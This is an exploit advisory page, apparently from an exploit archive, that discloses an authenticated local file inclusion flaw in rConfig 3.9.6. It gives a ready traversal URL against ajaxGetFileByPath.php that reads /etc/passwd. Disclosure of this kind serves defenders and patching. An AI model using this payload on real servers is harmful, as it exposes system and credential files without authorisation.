rConfig 3.9.6 Local File Inclusion

2021.03.16

Credit: 5a65726f

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-98

# Exploit Title: rConfig 3.9.6 - 'path' Local File Inclusion (Authenticated)
# Date: 2021-03-12
# Exploit Author: 5a65726f
# Vendor Homepage: https://www.rconfig.com
# Software Link: https://www.rconfig.com/downloads/rconfig-3.9.6.zip
# Version: rConfig v3.9.6
# Install scripts :
# https://www.rconfig.com/downloads/scripts/install_rConfig.sh
# https://www.rconfig.com/downloads/scripts/centos7_install.sh
# https://www.rconfig.com/downloads/scripts/centos6_install.sh
# Tested on: centOS 7
# Notes : If you want to reproduce in your lab environment follow those links :
# http://help.rconfig.com/gettingstarted/installation
# then
# http://help.rconfig.com/gettingstarted/postinstall
# Description:
rConfig, the open source network device configuration management tool, is vulnerable to local file inclusion in /lib/ajaxHandlers/ajaxGetFileByPath.php with parameter path. ajaxGetFileByPath.php allows authenticated users to download any file on the server.
The following steps can be carried out in duplicating this vulnerability.
- Login the rConfig application with your credentials.
- Enter the following link to your browser:
http(s)://<SERVER>/lib/ajaxHandlers/ajaxGetFileByPath.php?path=../../../../../../etc/passwd

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

rConfig 3.9.6 Local File Inclusion

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.